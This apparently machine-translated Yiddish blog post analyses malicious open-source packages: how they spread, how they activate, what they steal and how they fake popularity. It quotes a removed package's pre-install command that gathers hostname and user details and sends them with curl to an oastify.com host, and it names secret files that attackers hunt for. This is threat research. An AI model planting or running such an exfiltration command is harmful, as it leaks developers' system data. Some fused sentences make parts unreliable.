אין דער פריערדיקער עפּיזאָד, אָפֿן-קוואַל בייזוויליקע פּאַקאַדזשאַז: די פּראָבלעם, מיר האָבן דיסקוטירט פארוואס די סכנה אַקטיאָרן זענען געווען אַזוי ענטוזיאַסטיש וועגן ארויסגעבן נייע בייזע קאָמפּאָנענטן אָדער אינדזשעקטירן מאַלוואַרע אין די לעצטע ווערסיעס פון עקזיסטירנדיקע קאָמפּאָנענטן: די אָפֿן-קוואַל אינפראַסטרוקטור ערלויבט ווער עס יז ערגעץ צו שאַפֿן אַן עפֿעמערן חשבון אין אַ קאָמפּאָנענט רעגיסטרי (ווי NPM, PyPI, Docker Hub אדער Visual Studio Marketplace) אדער קאָלאַבאָראַטיווע אַנטוויקלונג פּלאַטפאָרמע (ווי GitHub). נול קאָסטן, און פילע געלעגנהייטן צו נוצן דעם איבעריקן צוטרוי וואָס ווייכווארג טימז טראַדיציאָנעל האָבן אויף דריט-פּאַרטיי קאָמפּאָנענטן.
די אסימעטריע צווישן ווי גרינג עס איז פאר אנפאלער צו פארשפרייטן מאלווער ניצנדיק די אינפראסטרוקטור וואס איז פאראן פאר אפען קוואל, און ווי שווער עס איז פאר ארגאניזאציעס וואס אנטוויקלען ווייכווארג (יעדער?) צו פארמיידן צו ווערן אנגעשטעקט מיט מאלווער (און צו צושטעלן מאלווער אין די ווייכווארג וואס זיי פארשפרייטן פאר אנדערע), האט געפירט צו דער קווארטער-מיליאן מארק פון בייזוויליגע פעקלעך כמעט דערגרייכט לעצטן יאר.
דאָס איז אַ פּראָבלעם פֿון אַזאַ גרייס אַז קיין איין אָרגאַניזאַציע קען עס נישט סאָלווען, און די קהילה איז אין פּראָצעס פֿון איבערפֿאָרמען דעם אָפֿן-קוואַל פּראָצעס וועגן צוטרוי, זיכער-דורך-דעפֿאָלט און זיכער-דורך-דיזיין פּרינציפּן, און דעם לעבן-ציקל פֿון קאָמפּאָנענטן. מיר וועלן אַ קוק טאָן אויף אַזעלכע געדאַנקען אין דער קומענדיקער עפּיזאָד. באַשיצן קעגן אָפֿן-קוואַל בייזוויליקע פּאַקאַדזשאַז: וואָס אַרבעט (אַרבעט נישט).
געדענקט אז מיר רעדן וועגן ווייכווארג קאמפאנענטן וואס רוב מאל קארעספאנדירן צו ווייכווארג פּאַקידזשיז: ווידער-ניצלעכע קאמפאנענטן פארפאקט אזוי אז זיי קענען ווערן רעפערענצירט אלס א דעפענדיענס אין א ווייכווארג מאניפעסט, און אינסטאלירט מיט א פעקל מענעדזשער אדער בילד געצייג. ביטע באמערקט אז דעם פאל קען ווערן פארברייטערט צו ארייננעמען פובליק קאַנטעינער בילדער (געניצט דורך קאנטעינער ראַנטיימס און אָרקעסטראַציע פּלאַטפאָרמעס ווי קובערנעטעס), און עקסטענשאַנז צו ווייכווארג מכשירים (פֿאַר בויען, אויטאָמאַטיזאַציע און דיפּלוימאַנט).
דאָ אַנאַליזירן מיר ווי דאָס אטאקע טאקטיק באזירט אויף בייזע קאמפאנענטן אַרבעט, לויט פריערדיקע ביישפילן און וואָס מיר האָבן געזען אין אונדזער פּלאַטפאָרמע פֿאַר מאַלוואַרע פרי וואָרענונג (MEW). מיר וועלן אנאליזירן בייזוויליגע קאמפאנענטן אין פארשידענע דימענסיעס:
(1) דער וועג אויסגעקליבן פאר פארשפרייטונג (רעגיסטרי גענוצט, אין א נייעם אדער עקזיסטירנדיקן קאמפאנענט, און די טעכניק גענוצט פארן אנשטעקן די ארויסגעגעבענע קאמפאנענט ווערסיע), (2) ווי אזוי די מאַלווער ווערט אַקטיוויזירט אדער אויסגערופן, (3) די בייזוויליקע אויפפירונג, ד.ה. וואָסערע שעדלעכע אַקציעס ווערן באמערקט און וואָס איז די מאָטיוואַציע פונעם אַטאַקירער, (4) וואָסערע טעכניקן זענען געוויינטלעך פֿאַר פֿאַרשטאַרקן, זיך באַהאַלטן כּדי נישט צו באַמערקן, זייטיקע באַוועגונג, קאָמוניקאַציע מיט קאָמאַנד און קאָנטראָל (C2) האָסטן, אאַז"וו; און (5) די טעכניקן פֿאַר באַקומען גענוג פּאָפּולאַריטעט און צוטרוי אַזוי אַז די קרבנות זאָלן ענדיקן אינסטאַלירן דעם קאָמפּאָנענט.
דער אויסגעקליבענער פאַרשפּרייטונג מעקאַניזם
מיר באַמערקן אַ "הינטערגרונט ראַש"פון נישט-פארזיכטיקע בייזוויליגע פּעקלעך וואָס נוצן טיפּאָסקוואַטינג צו פישן נישט-פארזיכטיקע דעוועלאָפּערס מיט אַ טיפּאָ אין דעם פּעקל נאָמען פֿאַר זייער דעפּענדענסי. פילע פּאָפּולערע פּעקלעך באַקומען אַ באַראַזש פון ענלעך-גערופענע פּעקלעך מיט טיפּאָס, מיט דער ערוואַרטונג אַז זיי וועלן פישן עטלעכע נישט-פארזיכטיקע דעוועלאָפּערס.
זיי ניצן אַן עפֿעמעראַלן אַקאַונט, פאַרעפֿנטלעכן אַ גרופּע טיפּאָסקוואַט פּאַקאַדזשאַז, שאַפֿן נאָך איינעם, און פאַרעפֿנטלעכן נאָך אַ גרופּע... ניצנדיק עטלעכע אָטאָמאַציע און קלוגשאַפֿט קענען זיי באַקומען עטלעכע סאָפיסטיקאַציע, אָבער טיפּיש זענען זיי גאַנץ טריוויאַל. מיר רופן זיי אינטערנאַל "אַנטשאָוויעסקרעדענשאַלז גנבענען איז די הויפּט ציל, אָבער מאל טרעפן מיר ספּייווערייַ וואָס גנבעט קוואַל קאָד אָדער סענסיטיווע דאַטן ווי פּערזענלעך אידענטיפיצירבאַרע אינפֿאָרמאַציע (PII), קליפּבאָרד קאַפּטשער, און אַנדערע ספקות.
פון הימל זעען מיר מער סאָפיסטיקירטע בייזוויליקע קאָמפּאָנענטן, די "הייפיש". א מינאָריטעט זענען געצילט צו ספּעציפֿישע גרופּעס אָדער אָרגאַניזאַציעס, טיפּיש מיט קריפּטאָ דריינערס אָדער וועב סקימערס וואָס זענען אַקטיוויזירט באַדינגט, אפשר נאָכפאָלגנדיק דעם צוגאַנג געזען אין די געשעעניש-שטראָם אינצידענט פון דעקריפּטירן די אַטאַק פּיילאָוד נאָר ווען דער פּעקל ווערט רעפערענסט פֿון אַ ציל פּעקל.
דער פאַרשפּרייטונג מעכאַניזם איז אַנאַליזירט געוואָרן אין דער אויסגעצייכנטער און איצט קלאַסישער אַרטיקל, "באַקשטאַבערס מעסער זאַמלונג: אַ רעצענזיע פון אָפֿן מקור ווייכווארג סאַפּליי טשיין אנפאלן", וואָס איז אַ מוז-לייענען. זיכער האָט איר שוין געזען דעם שיינעם טשאַרט פריער:

אלע וועגן זענען אויסגעפארשט געווארן, אריינגערעכנט נייע און עקזיסטירנדע פעקלעך; אפעקטירן דעם קוואל קאוד, דעם בויען סיסטעם, אדער דעם פארפאקטן קאמפאנענט אליין; ניצן גע'גנב'עטע קרעדענצן אדער סאציאלע אינזשעניריע; כאפן פארלאזענע אקאונטס און רעפאזיטאריעס אדער פאר'סמ'ן אויפגעהאלטענע. עטלעכע אטאקעס האבן באקומען נעמען (טיפּאָסקוואַטטינג, דעפּענדענסי צעמישונג, מאַניפעסט צעמישונג, רעפּאָ-דזשאַקינג. א.א.וו.) און זענען שוין דיסקוטירט געוואָרן אַנדערשוואו.
וואָס וועגן די אויסגעקליבענע רעגיסטערס?
NPM פירט ווייטער אין דער גאַנצער צאָל פון בייזוויליקע פּאַקאַדזשאַז, אָבער מיר האָבן געזען אַ שפּיץ אָנהייבנדיק דעם יאָר אויף PyPI. Python איז אַ פּאָפּולערע עקאָסיסטעם פֿאַר דאַטן וויסנשאַפֿט און מאַשין לערנען. אין פאַקט, די מאַלוואַרע געדיכטקייט איז איצט העכער אין PyPI ווי אין NPM.
ווי די מאַלוואַרע ווערט אַקטיוויזירט
בייזוויליקע פּעקלעך ווערן אַקטיוויזירט בעת דער אינסטאַלאַציע אין בלויז 4 פֿון 10 פֿאַלן (אין די לעצטע יאָרן איז עס געווען נאָענט צו 6 פֿון 10). די איבעריקע לויפֿן בייזוויליקע נאַטור בעת לויפֿצייט, מיט 1 פֿון 100 אַקטיוויזירט בשעתן לויפֿן טעסטן. די קעגנער ווייסן, אַז די אומקאָנטראָלירטע אויספֿירונג פֿון אינסטאַלאַציע סקריפּטן איז געווען דיאַקטיוויזירט אין פֿיל ערטער.
וואָס באַקומען די שלעכטע מענטשן?
מיר וועלן אויסרעכענען די קאַטעגאָריעס פון בייזוויליקע נאַטור, מיט די מערסט פּאָפּולערע ערשטער. ביטע באַמערקן אַז די ווירקונג קען זיין גאַנץ אַנדערש: א. ווייפּער איז האַרטנעקיק דעסטרוקטיוו, אָבער עס איז נישט געוויינטלעך און איז געזען געוואָרן בלויז אין אַ פּאָר פֿאַלן, פֿאַרבונדן מיט צילגעריכטעטע סייבער מלחמה קאַמפּיינז אָדער ברוטאַל כאַקטיוויזם. די פֿאָלגנדיקע קאַטעגאָריעס זענען גאַנץ געוויינטלעך:
- ינפאָסטעאַלער / קראַדענטשאַלז דריינער. די מערסט אָפטע, איבער 90% פון די נישט-געבילדעטע אַטאַקעס זענען פּשוטע גנבערס וואָס זוכן מערסטנס קרעדענשאַלז ווי פּאַסווערדז, אַקסעס טאָוקענס, API שליסלען און פּריוואַטע שליסלען (פֿאַר SSH און אַזוי ווייטער). עס איז מיסטאָמע די פּשוטסטע צו שרייבן (צוזאַמען מיט ווייפּערס?). זיי רעכענען אויס באַקאַנטע טעקעס/דירעקטאָריעס און אַנדערע קוועלער (למשל רעגיסטרי שליסלען), פּאַקן די אינהאַלט און שיקן די דאַטן צו אַ C2 סערווער. די געדאַנק איז פּשוט: "איך פאַרעפֿנטלעך אַ גנב פֿאַר פֿישינג קרעדענשאַלז, אַזוי איך קען שפּעטער נוצן די קרעדענשאַלז צו לאָנטשן אַ געריכטעט אַטאַק".
די C2 נעטוואָרקינג וואָס מען באמערקט איז טיפּיש ביליק און שמוציק, ווי טעלעגראַם קאַנאַלן אָדער נגראָק-ווי טונעלינג מכשירים (אָפט אין דער פֿאָרעם פֿון רעווערס פּראָקסיז וואָס ווערן אויסגעשטעלט דורך VPN אויסגאַנג IPs). עס זענען דאָ הונדערטער (!) מעגלעכקייטן, מיט פֿיל גיטהאַב פּראָיעקטן אונטער דער פּאַראָל-גנב טעמעספּעציאַליזאַציעס ווי קילאָגערס זענען זעלטן פֿאַר בייזע פּאַקאַדזשאַז און קאַנטיינער בילדער, אָבער מער אָפט אין געצייַג עקסטענשאַנז, וואו באַניצער ינטעראַקשאַן איז דערוואַרט.
- דראָפּער / דאַונלאָודער. די צווייטע אין פּאָפּולאַריטעט, טיפּיש קומט ערשטער אין מולטי-פאַזע אנפאלן. מער ווי איינער אין דריי פון בייזוויליקע קאָמפּאָנענטן האָבן דראַפּערס (אויב די בייזוויליקע פּיילאָוד קומט אַרייַנגערעכנט אין דעם פּעקל) אָדער דאַונלאָודערז (די פּיילאָוד איז דאַונלאָודיד פון אַן ענדפּוינט אונטער דער קאָנטראָל פון דעם אַטאַקער). די פּיילאָוד איז אָפט אַ באַקאַנטע ביינערי מאַלוואַרע וואַריאַנט, און עס איז געלאָפן און מאל פּערסיסטעד, פֿאַר ינסטאַלירן באַקדאָרז, ספּייווערייַ, קריפּטאָ דריינערס, און אנדערע נוצן קאַסעס. די פּיילאָוד דאַונלאָודיד אָדער דיפּלויד הייבט אָן אַ צווייט-פאַזע אַטאַק מיט אַלע די מאַכט צוגעשטעלט דורך יגזיסטינג מאַלוואַרע בינעריז. די בינעריז קענען זיין פאַרשפּרייט אין דעם פּעקל, אָפט מאַסקערייד ווי בילדער אָדער כביכול ומשעדלעך טעקע טייפּס, צו ויסמיידן דעטעקשאַן בשעת קאַנעקטינג צו אומגעריכט זייטלעך.
- קריפּטאָקוררענסי גנבערס / מיינערספינאַנציעל מאָטיווירטע קעגנער זענען גרייט צו נוצן אייערע וואָלקן אַסעץ צו לויפן קריפּטאָמיינערס (זיי אפילו דעטעקטירן אויב זיי לויפן אין אַ וואָלקן ווירטועל מאַשין). זיי זאָרגן זיך נישט וועגן דעם. נידעריק-פּראָפֿיט פאַרהעלטעניש פון $1 פאר יעדע $53 וואס מען בארעכנט דעם קרבן פאר דער גע'גנב'עטער וואָלקן אינפראַסטרוקטור. קרבנות זענען אפשר נישט באוואוסטזיניק דערפון ביז זיי באַקומען אַן אומגעריכטע רעכענונג. צומ גליק, דאָס קומט און גייט. Cryptojacking קאמפיינס אין בייזוויליגע פּעקלעך קומען מאל אויף און פארשווינדן, פישינג פאר בייטל באַניצער אָדער עווענטועל צילנדיק דעם בייטל פּראַוויידער, ווי אין די לעדזשער אטאקע.
אַנדערע נאַטורן, ווי דיפּלויינג אַ באַקדאָר פֿאַר ווײַטקאָד אויספֿירונג דורך עפֿענען אַ ריווערס שאָל איז ווייניקער אָפֿט איצט ווי אין דער פֿאַרגאַנגענהייט. למשל, די 123rf_contributor_web פּעקל (איצט אַוועקגענומען פֿון רעגיסטרי) עפֿנט זיך אָן קיין פֿאַרשטעלעניש, אַ פֿאַרקערטע שאָל קאָפּירט און געפּייסט פֿון פאַרקערט שאָל טשיִט שיט:

אין צוגאב צו לעגיטימע און בייזוויליגע קאמפאנענטן, האבן מיר באמערקט עטלעכע מיסברוכן, אריינגערעכנט:
ספּאַם פּאַקעטן
עס זענען דא טויזנטער קליינע פּעקלעך, מערסטנס אין NPM, אָן קיין מאַלווער אָבער צוזאָגן גרינגע פאַרדינסטן, שלאַנג-אויל, לינקס צו וויאַגראַ אָפפערס, און אַלץ דאָס. אַ פּאָר באַניצער פאַרעפֿנטלעכן אַזאַ ספּאַם און נעמען אַ סך באַנדווידט פֿון רעגיסטרי. נאָך אַ אַקטיאָר (ס) מעגלעך פֿון אינדאָנעזיע האָט פּרובירט צו באַקומען נוץ דורך מיסברויכן דעם טיי-ראַנג בדעה צו קאָמפּענסירן אָפֿן-קוואַל דעוועלאָפּערס, דורך שאַפֿן צענדליגער טויזנטער פֿאַרבונדענע NPM פּאַקאַדזשאַז מיט פֿאַרבונדענע GitHub דאַמי רעפּאָזיטאָריעס. דאָס איז אַ קלאָרע פֿאַרלעצונג פֿון די באַדינגונגען פֿון באַניץ.
באַג באַונטי און זיכערהייט פאָרשונג שווינדלערייען
ווען אַ פּעקל באַשרײַבט זיך ווי עקספֿילטרירן דאַטן פֿאַר גוטע צוועקן, ווי דעטעקטירן זיכערהייט חסרונות פֿאַר באַג באַונטי פּראָגראַמען אָדער פֿאָרשן געוויסע אַספּעקטן פֿון דער עקאָסיסטעם. מיר האָבן געזען טויזנטער פּעקלעך אין דעם קאַטעגאָריע, וואָס ברענגען אידענטיפֿיקאַציע אָבער נישט צו סענסיטיווע דאַטן צו אַ Burp Collaborator אַדרעס פֿון PortSwigger (למשל האָסט אין oastify.com דאָמעין). מיר האָבן אָפֿט באמערקט נאָכמאַכער פֿון די. דעפּענדענסי צעמישונג באַווייַז-פון-קאָנצעפּט דורך אַלעקס בירסאַן, ווי די אַוראָראַ-וועבמייל-פּראָ פּעקל (אַראָפּגענומען פֿון רעגיסטרי), וואָס פשוט לויפֿן דעם שלעכטן קאָד אין דעם פאַר-אינסטאַליר סקריפּט:
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done") און אויך אריינגערעכנט א "דאָס איז אַ פּשוטע דעפּענדענסי צעמישונג אַטאַק, אַ באַווייַז פון קאָנצעפּט."דיסקליימער באַשרייַבונג אין די package.jsonדאָס איז אַ קלאָרע פֿאַרלעצונג פֿון די תּנאים פֿון סערוויס, אפילו אָן שלעכטע כוונה.
גוטע נייעס? מיר האבן נאך נישט געזען קיין ראַנסאָמווער אטאקעס דורך בייזוויליגע קאָמפּאָנענטן. פֿאַר אומבאַקאַנטע סיבות, שיינט עס אַז סייבער-קרימינאַלן בעפֿאָרצוגן מער טראַדיציאָנעלע אימעיל פֿישינג, RDP-באַזירטע, און דרייוו-ביי דאַונלאָוד דעליווערי מעקאַניזמען.
נאָך טעכניקן באמערקט

פילע טעכניקן זענען גענוצט געוואָרן פֿאַר אָנהאַלטונג, פֿאַרטיידיקונג אויסמיידונג, אינפֿאָרמאַציע זאַמלען, קאָמוניקאַציע מיט קאָמאַנד און קאָנטראָל באַלעבאָטים, און עקספֿילטראַציע.
פּערסיסטאַנס אין בייזוויליקע קאָמפּאָנענטן ווערט באַקומען מיט די פּערסיסטענס פֿעיִטשערז אין אַ צווייט-סטאַדיום ביינערי מאַלוואַרע, אָבער מאַנטשמאָל געפינט זיך די נאַטור אין דעם פּאַקעט קאָד, מיט געפּלאַנטע טאַסקס און ענדערונגען אין די ווינדאָוז רעגיסטרי די מערסטע געוויינטלעך.
אָבפוסקאַטיאָן איז געוויינטלעך, אבער נישט סאפיסטיקירט. רוב טייפאסקוואטינג פעקלעך (געדענקט די "אַנטשאָוויעס"?) ניצן בכלל נישט קיין פארבלאזן-מאכן; אסאך ניצן אדער טריוויאלע (base64/hex ענקאודינג אדער סובסטיטוציע ציפערן ווי rot13) אדער ניצן פארהאן קאוד פארבלאזן-מאכן און מיניפיקאציע, וואס איז גרינג איבערצודרייען מיט די ריכטיגע געצייג. נאר די "הייפיש" טוען עכטע, הארט-קאר, פארבלאזן-מאכן, שווער צו איבערדרייען-אינזשענירן.
פארדעקונג קען אפשר באהאלטן דעם אטאקע, אבער פארוואס זאל קאוד אין אן אפענעם-קוואל קאמפאנענט דארפן פארדעק ווערן? איז דא באווייזן אז עפעס דארף באהאלטן ווערן פון קלארן אויג? מיר האבן געפונען אסאך פעלער פון נישט-בייזע פעקלעך וואס ניצן פארדעקונג צו באשיצן אינטעלעקטועלע אייגנטום, וואס איז קעגן דעם וואס מען זעט "אפען קוואל". פארדעקונג קען גענוצט ווערן אלס באווייז פון מאלווער, אבער עס איז נישט קלאר. עס איז אויך שווער צו דע-פארדעקענען.
Evasion פון פארטיידיקונג קאנטראלן נעמט אן איינפאכע טעכניקן. בייזוויליקע קאוד ווערט אפט באשיצט אין פּרובירן … כאַפּן בלאקס וואָס איגנאָרירן קיין אויסנעמען, אַזוי אַז אַבנאָרמאַלע טעטיקייט ווערט נישט געוויזן אין די לאָגס. וועריפיקאַציע פון דער סביבה (לויפט אין אַ ווירטועל מאַשין אָדער קאַנטיינער) איז זעלטן, אַחוץ אויב עס איז מאַלוואַרע וואָס צילט אויף אַ באַזונדער אָרגאַניזאַציע אָדער סביבה.
מאַסקערירן בינעריעס אין בילדער און פּי-די-עף טעקעס (אַ סאָרט סטעגאַנאָגראַפֿיע) איז געווען נאָך אַ טעכניק געזען צו ויסמיידן דעטעקשאַן.
וויבאלד די מערסטע פארשפרייטע שלעכטע קאמפאנענטן זענען אינפאָ-גנבים, דאַטן זאַמלונג איז עסענציעל. סודות (פּאַראָלן, אַקסעס טאָקענס, API שליסלען, קריפּטאָגראַפֿישע שליסלען) ווערן רוטינמעסיק געסקענט אין לאָג טעקעס, סביבה וועריאַבאַלן, און אפילו די קליפּבאָרד (געזען מיט באַנקינג טראָדזשאַנז און קריפּטאָ גנבים). קוואַל קאָד עקספֿילטראַציע איז אויך געוויינטלעך, ווייל די פּאַקאַדזש ינסטאַלירונג ווערט אָפט געטאָן אין אַ אַנטוויקלונג נאָדע וווּ אינערלעכע גיט ריפּאַזאַטאָריז קען זיין קלאָנירט. מיר האָבן געזען פּאַקאַדזשאַז וואָס רעכענען דירעקטאָריעס אין זוכן פון גיט ריפּאַזאַטאָריז. זוכן פֿאַר לאָוקיישאַנז ווי .env, private.pem, settings.py, app.js, אָדער application.properties איז גאַנץ געוויינטלעך.
עקספילטראַציע איז נאָך אַ ברייט פאַרשפּרייטע אַקציע. נאָר אַ מינאָריטעט פון בייזוויליקע פּאַקאַדזשאַז פּרוּוון אפילו צו באַהאַלטן די דעסטינאַציע פון די עקסטראַקטירטע דאַטן. טעלעגראַם קאַנאַלן און נגראָק-ווי טונעלן ווערן אָפט גענוצט. און עס זענען דאָ פילע טיפּיש ווייסליסטעד דאָומיינען געניצט פֿאַר עקספילטראַציע.
אַנדערע טעכניקן, ווי פּריווילעגיע עסאַקאַלאַציע אָדער לאַטעראַל באַוועגונג, זענען געווען ווייניקער געוויינטלעך.
געווינען פּאָפּולאַריטעט און צוטרוי
שטעלט זיך פאר א טעק גנב מיט א גרייטע, בייזוויליקע זאך וואס פרעגט זיך: "ווי אזוי מאך איך דעם שטיקל דרעק! פארטרויליך פאר יענע אומשולדיגע נארישע מענטשן?".
דאָס איבערזעצט זיך אין ווי אַזוי צו מאַכן דעם אַרייַנגאַנג פֿאַר די בייזוויליקע קאָמפּאָנענט צו ווייַזן פילע שטערן / גאָפּל (פֿאַר פּאָפּולאַריטעט), פּלוס ווערסיעס / פּראָבלעמען און pull requests (פֿאַר אַקטיוויטעט). די געדאַנק איז צו באַקומען אויסגעטראַכטע פּאָפּולאַריטעט (שטערן) און אָפּהענגיקע, און אַן איבערצייגנדיקן בליק וועגן רעלאַוואַנץ און וישאַלט.
די רעגיסטרי קאָנטראָלירט נישט צי דער אינהאַלט אין אַ גיטהאַב פּראָיעקט און דער פּאַקעט אינהאַלט שטימען איבער.דאָס איז אַ באַקאַנטע פּראָבלעם אין דער ווייכווארג צושטעל קייט. די עפנטלעכע רעגיסטריז זענען ריזיקע זינקלאָכער וואָס שלינגען אַלץ וואָס מען וואַרפט אויף זיי. איר קענט פֿאַרבינדן יעדע רעפּאָזיטאָרי.

אויב דער בייזוויליקער פּעקל מאַכט אַ טיפּאָ-סקוואַט אין אַ פּאָפּולערן, איז דאָס גאַנץ פּשוט: נאָר רעפֿערירן דעם עקזיסטירנדיקן גיטהאַב רעפּאָזיטאָרי אין דעם דעפּענדענסיעס מאַניפעסט געניצט פֿאַר שאַפֿן דעם פּעקל און פאַרעפֿנטלעכן עס אין דער רעגיסטרי. פֿאַר נײַע פּעקלעך אויף אַ פֿאַלשן גיטהאַב רעפּאָ, קען מען דאַרפֿן מער פֿינישקייט, אפשר שאַפֿן פֿאַלשע. שטערן-קוקן/פארקינג גיטהאב אקאונטס דורך סקריפּטינג.
און אויב דער אינהאַלט פֿון אייער פּעקעדזש איז גאַנץ ענלעך צום רעפּאָ, לייגט אַרײַן אַ פּאָר גוט־געפּלאַנטע ענדערונגען דאָ און דאָרט... איר קענט אַרײַנשטעלן אייער מאַלווער אין אַ נײַעם פּעקעדזש, וואָס זעט אויס ווי אַ פּאָפּולערן, וואָס באַציט זיך צום עקזיסטירנדיקן רעפּאָזיטאָרי, און וואַרטן אויף די טיפּאָס. אויב איינער וואָלט זיך געוואָגט צו פֿאַרגלײַכן דעם אינהאַלט פֿון פּעקעדזש טאַרבאָל מיטן אינהאַלט פֿון גיטהאַב רעפּאָזיטאָרי, קען מען גרינג פֿאַרפֿעלן די אונטערשיידן בײַ די מאַלווער־אײַנשטעקונג־פּונקטן. מיר האָבן שוין געזען דעם צוגאַנג פֿיל מאָל פֿריִער.
א מעכאניזם פאר א קאמפאנענט צו מאכן א זיכערע סטעיטמענט וועגן דעם אפשטאם, ווי אזוי די פעקל איז געבויט געווארן, פון וועלכע קוועלער, און דורך וועמען, וואלט געווען באגריסן. אבער דאס איז אן אנדערע מעשה.
איז קאָמפּאָנענט X מאַלוואַרע?
איז דא א (אויספירלעכע) דאטאבאזע פון בייזוויליגע פעקלעך? ניין. אפענע-קוואל שוואכקייטן האבן א CVE ID באשטימט, אבער נאר א פאר בייזוויליגע פעקלעך (ספעציעל די וואס מאכן די נייעס) באקומען איינס. די CWE פאר בייזוויליגע פעקלעך איז CWE-506 (איינגעבעטן בייזוויליקן קאָד).
די געוויינטלעכע מאַלווער מכשירים (VirusTotal, MalwareBazaar, SOREL-20M…) מאַכן נישט ספּעציפֿישע פּראָוויזשאַנז פֿאַר בייזוויליקע קאָמפּאָנענטן. דאָס וואָלט זיין באַגריסן!
עס זענען דא פארשונג ביישפיל דאטאבאזעס און דאטאסעטס פאר אנאליז (מיר ניצן א פאר פון זיי), אבער איינטראגעס ווערן נאר אפדעיטעד ווען מען ווייסט וואס דער בייזוויליקער פעקל איז, וואס איז אפט צו שפעט. אויב איר זענט אינטערעסירט, די OpenSSF בייזוויליקע פּעקלעך איז אַ שיינער אָנהייב.
אין דעם קומענדיקן בלאָג־פּאָסטן וועלן מיר דיסקוטירן ווי אַזוי צו וויסן צי אַ געגעבענער פּעקל איז בייזוויליק. ספּוילער: יאָ, עס זענען דאָ וועגן צו קאָנטראָלירן פֿאַר בייזוויליקע קאָמפּאָנענטן פרי בעת דעם עקספּאָוזשער־פֿענצטער, איידער די רעגיסטרי נעמט אַוועק אַ באַקאַנטן בייזוויליקן קאָמפּאָנענט.
ווייַטער לייענען
אין דער קומענדיקער עפּיזאָד "באַשיצן קעגן אָפֿן-קוואַל בייזוויליקע פּאַקאַדזשאַז: וואָס אַרבעט (אַרבעט נישט)" מיר וועלן דיסקוטירן די זאכן וואָס מען זאָל און וואָס מען זאָל נישט טאָן פֿאַר אָפֿן-קוואַל זיכערהייט. רובֿ זיכערהייט-באַוואוסטזיניקע פּראָפעסיאָנאַלן האָבן אינטואיציעס וועגן ווי צו האַנדלען מיט דעם סאַקאָנע, אָבער מיסקאַנסעפּשאַנז זענען פילע.
מיר וועלן איבערקוקן פארוואס די געדאנקען זענען פאַלש, און ווי אזעלכע מיסקאַנסעפּשאַנז ביישטייערן צו דער פּאָפּולאַריטעט פון דעם אַטאַק מעקאַניזאַם, און צו דעם אָוווערוועלמינג ריזיקירן וואָס אָרגאַניזאַציעס דערפאַרן. מיר וועלן דעמאָלט פאָרזעצן מיט וואָס אַרבעט יאָ, און וואָס איז די מי און רעסורסן וואָס זענען ינוואַלווד.
אויך, מיר וועלן שרייבן וועגן דער עוואלוציע פון בייזוויליגע פּעקלעך אין טערמינען פון זייער כוונה, אינדזשעקשאַן מעקאַניזאַם, און אַטאַק טעקניקס.
האלט ווייטער מיט!






